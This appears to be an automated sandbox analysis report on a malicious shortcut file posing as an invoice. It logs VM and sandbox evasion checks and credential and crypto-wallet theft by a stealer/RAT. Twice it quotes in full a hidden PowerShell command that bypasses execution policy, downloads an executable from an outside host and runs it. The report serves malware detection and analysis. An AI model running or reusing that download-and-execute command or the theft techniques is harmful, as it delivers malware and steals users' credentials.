                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeMemory allocated: 980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeMemory allocated: 1A7A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4711Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWindow / User API: threadDelayed 7190Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWindow / User API: threadDelayed 2734Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4119Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5669Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exe TID: 7600Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 4119 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep count: 5669 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000000.00000002.1770345569.000001F3F026F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-CH:VMware|VIRTUAL|A M I|Xen
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-CH:Microsoft|VMWare|Virtual
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen2y
                    Source: svhosts.exe, 00000002.00000002.2064677835.0000000000A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: amsi64_7332.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR
                    Bypasses PowerShell execution policy
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\svhosts.exe "C:\Users\user\AppData\Roaming\svhosts.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 10; Remove-Item -Path 'C:\Users\user\AppData\Roaming\svhosts.exe' -ForceJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://fermazapoved.ru/images/sys.exe','c:\users\user\appdata\roaming\svhosts.exe');start-process 'c:\users\user\appdata\roaming\svhosts.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeQueries volume information: C:\Users\user\AppData\Roaming\svhosts.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: powershell.exe, 00000000.00000002.1773813658.00007FFD9BA70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                    Tries to harvest and steal Bitcoin Wallet information
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svhosts.exe PID: 7548, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts41
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Credentials in Registry                    		34
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts3
                    PowerShell                    		Logon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information                    		Security Account Manager331
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                    Software Packing                    		NTDS11
                    Process Discovery                    		Distributed Component Object Model1
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets51
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		3
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
                    Virtualization/Sandbox Evasion                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Inovice_3_ETH.lnk70%ReversingLabsShortcut.Downloader.Ploprolo
                    Inovice_3_ETH.lnk100%AviraTR/LNK.PSH.Downloader.Gen
                    Inovice_3_ETH.lnk100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\svhosts.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Roaming\svhosts.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\svhosts.exe83%ReversingLabsByteCode-MSIL.Trojan.Mardom

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    https://support.mozilla.org0%URL Reputationsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    http://fermazapoved.ru0%Avira URL Cloudsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%Avira URL Cloudsafe
                    http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://fermazapoved.ru0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                    http://www.microsoft.co0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                    http://fermazapoved.ru/images/sys.exe0%Avira URL Cloudsafe
                    http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                    https://github.com/Pester/Pester0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%Avira URL Cloudsafe
